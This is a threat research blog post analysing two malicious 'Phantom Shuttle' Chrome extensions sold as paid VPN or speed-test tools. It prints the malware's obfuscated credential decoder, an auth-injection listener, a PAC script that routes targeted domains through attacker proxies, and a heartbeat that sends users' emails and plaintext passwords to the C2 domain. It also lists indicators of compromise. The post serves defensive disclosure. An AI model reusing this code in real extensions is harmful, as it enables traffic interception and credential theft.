Fake “Phantom Shuttle” VPN Chrome extensions (active since 2017) hijack proxy auth to intercept traffic and continuously exfiltrate user credentials to attacker infrastructure.
December 22, 2025
9 min read
Socket's Threat Research Team identified two malicious Chrome extensions sharing the same name Phantom Shuttle (幻影穿梭), published by the same threat actor using the email theknewone.com@gmail[.]com, distributed since at least 2017. The extensions market themselves as "multi-location network speed testing plugins" for developers and foreign trade personnel. Users pay subscriptions ranging from ¥9.9 to ¥95.9 CNY ($1.40 to $13.50 USD) believing they're purchasing a legitimate VPN service, but both variants perform identical malicious operations. Behind the subscription facade, the extensions execute complete traffic interception through authentication credential injection, operate as man-in-the-middle proxies, and continuously exfiltrate user data to the threat actor's C2 server.
Both extensions also use the legitimate jQuery library v1.12.2 by prepending malicious code that automatically injects hardcoded proxy credentials (topfany / 963852wei) into every HTTP authentication challenge. Users unknowingly route all web traffic through threat actor controlled proxies while the extension maintains a 60-second heartbeat to its C2 server at phantomshuttle[.]space, which remains operational as of December 23, 2025.
The extensions have over 2,180 users so far and remain live at the moment of this publication. We've submitted takedown requests to Google's Chrome Web Store security team.
Socket's AI Scanner detecting malicious backdoor code in the Phantom Shuttle extensionsThe Chrome Web Store listing positions Phantom Shuttle as a convenient network tool for developers and foreign trade workers who need to test connectivity from multiple geographic locations.
"即装即用,设置简单,为开发、外贸人员提供的模拟多地点网速测试插件。"
Translation from Chinese: "Ready to use, simple setup, a simulated multi-location network speed testing plugin for developers and foreign trade personnel."
The marketing emphasizes legitimate features like smart proxy management, multi-node switching, real-time speed monitoring with automatic ping tests, and customizable domain lists. The description makes no mention of credential injection, traffic interception, data exfiltration, or the malicious JavaScript libraries embedded in the extension.
The extension presents a professional interface with user registration, login, and a complete payment system integrated with Alipay and WeChat Pay. This facade of legitimacy, combined with the narrow targeting of Chinese-speaking developers and trade workers, makes victims unlikely to suspect malicious intent.
Users choose from four VIP tiers: Basic (¥9.9/month), Recommended (¥26.9/quarter with 10% discount), Popular (¥50.9/6-months with 15% discount), and Premium (¥95.9/year with 20% discount). After payment, users receive VIP status and the extension auto-enables "smarty" proxy mode, which routes traffic from 170+ targeted domains through the C2 infrastructure. The payment integration and tiered pricing structure mirror legitimate commercial services, creating victim retention through financial commitment while generating revenue for the threat actor.
This approach differs from typical malware distribution. Users actively seek out the extension, pay for access, and receive functional proxy services that appear to work as advertised. The extension performs actual latency tests to proxy servers and displays connection status, reinforcing the illusion of a legitimate product. Most victims remain unaware that their traffic is being intercepted and credentials stolen.
The credential injection mechanism lives inside two malicious JavaScript libraries bundled with the extension. Both jquery-1.12.2.min.js and scripts.js contain identical malicious code prepended to legitimate library code.
The malware uses a custom character-index encoding scheme to hide hardcoded credentials in both assets/js/jquery-1.12.2.min.js and scripts.js:
var tjp = "abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ ;/:'\"!@#$%^&*()1234567890-=+_\\][{}|<>?,./`~";
function jerry(str) {
if ((!str) || str == "undefined") return false;
var rt = "";
var art = str.split("|");
if ((!art) || art == "undefined") return false;
art.forEach(function(e) {
if (e && e !== "undefined") {
rt += tjp[e];
}
});
return rt;
}
// Encoded credentials
var P_x = "19|14|15|5|0|13|24|"; // topfany
var P_y = "78|75|72|77|74|71|22|4|8|"; // 963852wei
var xtin = jerry(P_x);
var ytin = jerry(P_y)The encoding splits strings into pipe-separated indices that map to characters in the tjp alphabet. This obfuscates the credentials topfany / 963852wei from basic static analysis. The decoded credentials are stored in variables xtin and ytin, then used in the authentication listener.
The libraries register a listener on chrome.webRequest.onAuthRequired that intercepts every HTTP authentication challenge across all websites:
chrome.webRequest.onAuthRequired.addListener(function(B, A) {
A({
authCredentials: {
username: xtin, // "topfany"
password: ytin // "963852wei"
}
})
}, {
urls: ["<all_urls>"]
}, ["asyncBlocking"]);When any website or service requests HTTP authentication (Basic Auth, Digest Auth, or proxy authentication), this listener fires before the browser displays a credential prompt. It immediately responds with the hardcoded proxy credentials, completely transparent to the user. The asyncBlocking mode ensures synchronous credential injection, preventing any user interaction.
This mechanism serves two purposes. First, it automatically authenticates to threat actor controlled proxy servers without requiring user credentials. Second, it could potentially authenticate to any HTTP-protected resource using these credentials, though the primary target is the proxy infrastructure itself.
After users authenticate and activate VIP status, the extension dynamically configures Chrome's proxy settings using a PAC (Proxy Auto-Configuration) script. The extension implements three proxy modes: "close" (disabled), "always" (route all traffic), and "smarty" (selective targeting).
The "smarty" mode uses a hardcoded list of 170+ high-value domains that get routed through the threat actor’s proxy:
function ne() {
chrome.storage.local.get(["autoProxyList", "position"], function(j) {
let domains = typeof domainList === 'string' ? domainList.split(",") : domainList;
let decodedProxy = U(proxyServer);
let pacScript = `var FindProxyForURL = function(url, host){
var D = "DIRECT";
var p = '${decodedProxy}';
// Exclude private IPs and localhost
if (shExpMatch(host, '10.[0-9]+.[0-9]+.[0-9]+')) return D;
if (shExpMatch(host, '192.168.[0-9]+.[0-9]+')) return D;
if (shExpMatch(host, '127.[0-9]+.[0-9]+.[0-9]+')) return D;
// Exclude C2 domain
if (url.indexOf('phantomshuttle') >= 0) return D;
// High-value targets
if (url.match(/google/)) return p;
if (url.match(/twitter/)) return p;
if (url.match(/github/)) return p;
// Domain whitelist matching
${domains.map(d => `
if (shExpMatch(url, '*.${d}/*')) return p;
`).join('\n')}
return D;
}`;
chrome.proxy.settings.set({
value: { mode: "pac_script", pacScript: { data: pacScript } },
scope: "regular"
});
});
}The target list includes developer tools (github.com, stackoverflow.com, docker.com, npm registries), cloud services (amazonaws.com, digitalocean.com, Azure), corporate platforms (cisco.com, ibm.com, vmware.com), social media (facebook.com, twitter.com, instagram.com), and adult content sites (pornhub.com, xvideos.es, 91porn.com). The inclusion of adult sites may be used for blackmail material and privacy leverage.
The PAC script excludes private IP ranges to maintain normal LAN connectivity and excludes the C2 domain itself to ensure control channel reliability. Google connectivity check endpoints are also excluded to avoid detection, as Chrome uses these to validate internet connectivity.
Once traffic routes through the proxy authenticated with topfany / 963852wei, the threat actor gains a man-in-the-middle position. All HTTP traffic (URLs, headers, POST data) passes through C2 infrastructure. HTTPS traffic remains encrypted in transit but could be intercepted if the threat actor deploys a malicious root certificate. The proxy position also enables response manipulation, malicious payload injection, and cookie theft from HTTP headers.
The extensions implements multiple data collection mechanisms that operate continuously while the extensions remains active.
The extension establishes a 60-second heartbeat to its C2 server at phantomshuttle[.]space:
chrome.alarms.create("heartbeat", {
delayInMinutes: 1,
periodInMinutes: 1
});
chrome.alarms.onAlarm.addListener(function(alarm) {
if (alarm.name === "heartbeat") {
chrome.storage.local.get(["email", "password", "level", "proxyMode"], function(stored) {
if (stored.level === "1" && stored.proxyMode !== "close") {
sendHeartbeat(stored);
}
});
}
});The heartbeat alarm fires every 1 minute but only transmits data to the server every 5 minutes (300,000 milliseconds). The VIP status check function Q() handles the actual data transmission:
function Q(type = "1") {
chrome.storage.local.get(["email", "password"], function(stored) {
chrome.storage.local.get(["positiond", "email", "noticetime2"], function(config) {
let apiUrl = config.positiond ?? "";
let email = config.email ?? "";
if (apiUrl) {
fetch(U(apiUrl), { // U() decodes the API URL
method: "GET",
body: JSON.stringify({
type: type,
email: email,
password: stored.password,
version: "319"
})
}).then(response => response.json())
.then(data => {
// Process server commands
if (data.type === "999") {
// Not logged in - disable proxy
setProxyMode("close");
}
if (data.type === "801") {
// VIP expired - disable proxy
setProxyMode("close");
}
if (data.type === "99") {
// Multiple logins detected - force logout
chrome.storage.local.set({email: "", token: ""});
}
});
}
});
});
}The heartbeat transmits user email, password in plaintext, and version number directly to the threat actor's server via GET request with JSON body. This occurs every 5 minutes for all active VIP users, providing continuous credential exfiltration and session monitoring.
The extension regularly checks VIP status and responds to server commands that facilitate data exfiltration:
Each API call to check VIP status sends the user's email and password in plaintext to the C2 server, even when just verifying account status. This design ensures continuous credential exfiltration under the guise of normal subscription validation.
The extension uses multiple channels to transmit collected data to the C2 server:
1. Configuration Download (Initial Contact)
fetch("https://phantomshuttle[.]space/index[.]php?g=user&m=register&a=do_query_server")
.then(response => response.json())
.then(data => {
// Server responds with encoded proxy credentials, API endpoints, payment URLs
const config = {
positionx: data.positionx, // Encoded proxy username
positiony: data.positiony, // Encoded proxy password
positiona: data.positiona, // Encoded registration API URL
positionc: data.positionc, // Additional config
positiond: data.positiond, // Encoded VIP status check URL
positione: data.positione, // Encoded alternate API URL
positionf: data.positionf, // Additional endpoints
positiong: data.positiong,
positionh: data.positionh,
cfg_websiteurl_s: U(data.positiond), // Decoded URLs stored for quick access
cfg_websiteurl: U(data.positione)
};
chrome.storage.local.set(config);
});2. Heartbeat Transmission (Every 5 minutes)
chrome.storage.local.get([
"email", "password", "token", "level",
"proxyMode", "hearttimes"
], function(stored) {
// Transmits to C2 via decoded positiond endpoint
const payload = {
type: "99", // Heartbeat type
email: stored.email,
password: stored.password,
version: "319"
};
fetch(decodedApiUrl, {
method: "GET",
body: JSON.stringify(payload)
});
});3. Proxy Traffic (Continuous MITM)
All traffic to the 170+ targeted domains routes through threat actor-controlled proxies authenticated with topfany / 963852wei. The proxy position enables:
The combination of heartbeat exfiltration (credentials and metadata) plus proxy MITM (real-time traffic capture) provides comprehensive data theft capabilities operating continuously while the extension remains active.
User credentials, session tokens, and configuration data persist in Chrome's local storage:
// Location: chrome.storage.local (persistent across browser sessions)
// The following snippet is an example of what the chrome.storage.local data would look like
{
"email": "user@example.com",
"password": "user_password",
"token": "session_token",
"level": "1",
"expire": "2025-12-31",
"position": "[encoded_proxy_url]",
"cfg_websiteurl": "[decoded_api_url]",
"nodePingTimes": {"server1": 123, "server2": 456},
"failedDomains_[tabId]": ["blocked-domain.com"],
"autoProxyList": ["google.com", "facebook.com", ...]
}This data remains accessible to the extension across browser restarts. The storage of plaintext or weakly hashed passwords in chrome.storage.local provides the threat actor with credential access if they compromise the local storage database. The encoded proxy URLs use the same jerry() decoding function from the malicious libraries.
Our analysis confirmed the C2 server remains operational as of today. DNS resolution shows phantomshuttle[.]space pointing to IP address 47[.]244[.]125[.]55, hosted on Alibaba Cloud in Hong Kong. WHOIS records indicate domain registration on November 3, 2017, with expiration set for November 3, 2026. The 8+ year operational timeline demonstrates sustained criminal infrastructure rather than a short-term campaign.
The domain uses Cloudflare for CDN and DDoS protection, making takedown more difficult. Cloudflare's privacy protection obscures the true registrant identity. The server responds to HTTPS requests on port 443 with valid SSL certificates, presenting a professional appearance to users and security scanners.
API endpoint testing confirmed multiple active endpoints:
https://phantomshuttle[.]space/index[.]php?g=user&m=register&a=do_query_server
https://phantomshuttle[.]space/price[.]php
https://phantomshuttle[.]space/index[.]php?g=Pay&m=Index&a=payaction
https://phantomshuttle[.]space/index[.]php?g=wxpay&m=wxpay&a=wxpay_apiThe unauthenticated response from the server configuration endpoint returns proxy credentials and payment URLs but does not include actual proxy server IP addresses. Proxy servers appear to be dynamically assigned after user authentication, retrieved from the /list.php endpoint or delivered through the user status API. This two-stage model prevents enumeration of proxy infrastructure without valid credentials.
For users accessing targeted domains while VIP mode is active, the extension captures:
The developer and foreign trade targeting creates high corporate risk. An employee using this extension on a personal device that also accesses corporate VPN creates a breach vector:
The 170-domain target list specifically includes cloud service consoles (AWS, Azure, GCP), version control systems (GitHub, GitLab), and development tools (Docker, npm registries). Developer credential theft enables supply chain attacks through compromised source repositories or malicious package injection.
The adult content site inclusion provides blackmail leverage. Browsing history combined with financial data and personal information creates extortion opportunities beyond simple credential sales.
Phantom Shuttle combines deceptive commercial service distribution with credential theft and traffic interception. The subscription model creates victim retention while generating revenue, and the professional infrastructure with payment integration presents a facade of legitimacy. Users believe they're purchasing a VPN service while unknowingly enabling complete traffic compromise.
The 8+ year operational timeline and active infrastructure indicate an established threat actor with sustained criminal operations. The Chinese language targeting, Alipay/WeChat Pay integration, and Alibaba Cloud hosting suggest China-based operation, though the threat actor could be anywhere given cloud infrastructure accessibility.
Similar patterns will likely appear in other commercial VPN and proxy extensions. Extensions that combine subscription models with extensive permissions, particularly webRequestAuthProvider, proxy, and management, should be treated as high-risk. Unexpected authentication injection, hardcoded credentials, or opaque backend requests indicate manipulation, particularly when the extension presents itself as a convenience tool with professional payment integration.
webRequestAuthProvider permissionSocket's Chrome extension protection analyzes extension bundles for hidden credential injection, unexpected authentication flows, and obfuscated proxy logic, blocking malicious updates before they compromise user endpoints.
fbfldogmkadejddihifklefknmikncaj & ocpcmfmiidofonkbodpdhgddhlcmcofdtheknewone.com@gmail[.]comphantomshuttle[.]space47[.]244[.]125[.]55topfany / 963852weiSubscribe to our newsletter
Get notified when we publish new security blog posts!
Research
/Security News
Socket is tracking cloned Open VSX extensions tied to GlassWorm, with several updated from benign-looking sleepers into malware delivery vehicles.
Research
/Security News
Bitwarden CLI 2026.4.0 was compromised in the Checkmarx supply chain campaign after attackers abused a GitHub Action in Bitwarden’s CI/CD pipeline.
Research
/Security News
Docker and Socket have uncovered malicious Checkmarx KICS images and suspicious code extension releases in a broader supply chain compromise.